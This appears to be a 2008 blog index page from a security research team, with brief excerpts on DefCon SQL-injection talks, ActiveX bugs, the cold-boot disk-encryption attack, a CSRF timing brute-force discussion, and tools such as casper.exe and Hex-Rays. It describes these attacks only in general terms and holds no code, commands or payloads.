Research
BlackHat / DefCon 2008….
Hey guys..
Most of our BlackHat/Defcon team has arrived back home in one piece.. I landed with a fever and a lost voice (but to be honest i already caught something while in Vegas!)
We will post some post-Vegas thoughts as soon as the dust settles, but i also promised:
The slides from our talk The tools we released… A link to the slides is here: [Pushing a Camel through the eye of a Needle]
DefCon 16 – Hmm.. 2 of these talks seem familiar…
Some of the DC16 speaker summaries have been posted, and these 2 caught my eye:
Time-Based Blind SQL Injection using heavy queries and
New Tool for SQL Injection with DNS Exfiltration Both descriptions seem pretty much spot on with what we did in our DefCon talk last year..
hmm.. wonder if its new twists on it, or a little more of the same?
/mh
ActiveX Repurposing.. (aka: Other bugs your static analyzer will never find..) (aka 0day^H^H 485day bug!)
Earlier this week we had an internal presentation on Attacking ActiveX Controls. The main reason we had it is because of the ridiculously high hit rate we have whenever we look at controls with a slight security bent.. When building the presentation i dug up an old advisory we never publicly released (obviously we reported it to the vendor who (kinda) promptly fixed the bug (without giving us any credit at all, but hey.. ))
While the IEBlog promises updates to IE8 that will minimize the damage caused by owned controls in the future, the fundamental problems with ActiveX today are an attackers dream.
Prof Felten (and friends) attack bitlocker/filevault (and friends)
So felten et al basically figured that cooling dram chips allows an attacker to move them to another machine where they can be leeched!
The geek in me cant help but say “COOL!”
According to the comments posted (by Eugene Spafford no less) this sort of attack is fairly well known.. but.. for this humble fanboy, i think its still pretty rocking!
Rob Auger from OWASP/WASC/CGiSecurity on Timing..
Rob had a rant on his site on the timing attack, with a CSRF twist.. We met him after our Vegas talk, but im not really sure how his attack differs from our published one..
my on-list response:
-snip- From: haroon meer To: bugtraq@cgisecurity.net Cc: websecurity@webappsec.org Subject: Re: [WEB SECURITY] Performing Distributed Brute Forcing of CSRF vulnerable login pages Hi Robert..
Thanks for the kind words on the talk.. If you check out the visio at: http://www.sensepost.com/blogstatic/2007/08/dxsrt.png you will see that its pretty much the same attack.. In a shameless display of self-pimpage, check out the paper http://www.sensepost.com/research/squeeza/dc-15-meer_and_slaviero-WP.pdf from page 12.. Figure 23 for example shows the results in a victim/zombies browser, after he has visited our page.. Effectively he tries the userlist we send him (in this case on a standard squirrelmail login page). Once he detects a timing diff (again using a trivial algorithm to avoid latency disparity) he simply makes another request to the attacker to report his success..
Casper and hidden IE windows..
OK.. so it was a long time ago, and old code is supposed to embarrass
you.. but i pulled casper.exe form our webpage today
to test something for the project im on..
interestingly it runs pretty ok, and actually doesnt look from the
outside as ugly as it is underneath..
if you never used casper, take it for a quick spin.. if nothing else u
will be suprised by how many invisible windows currently live on your
desktop..
Google as an MD5 Cracker..
Slashdot picked up on the blog post from Light Blue TouchPaper commenting on the fact that a researcher was suprised to discover that simply putting an md5 hash into google returned a hit with a mapping to the original word..
This is an interesting concept.. A while back, we decided to fiddle with the concept of using googles indexing and spidering as a new take on the time/space trade-off for password cracking..
Introducing Hex-Rays…
These days its almost impossible to read a book on security or vuln-dev without a gratuitous IDA-Pro screenshot. IDA has proven itself so valuable at reversing that its near impossible to find texts that fail to mention it. (Even ancient texts from fravia and woodman will make reference to it).
Well.. for a long long time people have wondered why ilfak (ida’s main author) didnt get into the point and click vuln finding / point-and-click disassembler business.. For a long time he (and datarescue stayed out of it), till now..
Alas.. i could have made squillions (aka – Amazon MTURK)
In early 2002 i suggested that we could solve some computer problems and south africas street-kid problem by setting up a network of street=kids with basic education to handle tasks computers still struggled with. At the time we were concerned with low-false positive, agentless remote detection of defaced web-sites, but also ran into the idea when we first built e-or, our early web application scanner. I suspect i didnt broach the subject with enough sensitivity (and in retrospect suggesting that remote controls for automatic gates could be replaced by 2 low cost street-kids (one as a spare)) might not have helped my cause..
Awesome data visualization stuff…
Steven Murdoch over at lightbluetouchpaper did an investigation into the Privila internship program.. What was also cool however was that he threw together a quick visualization of the data
Moving graphs are always cool, and the fact that he got it together so quickly was impressive.. a quick check shows that he used the Prefuse toolkit which is a totally BSD lic. visualization toolkit that looks simple to use with some awesome examples..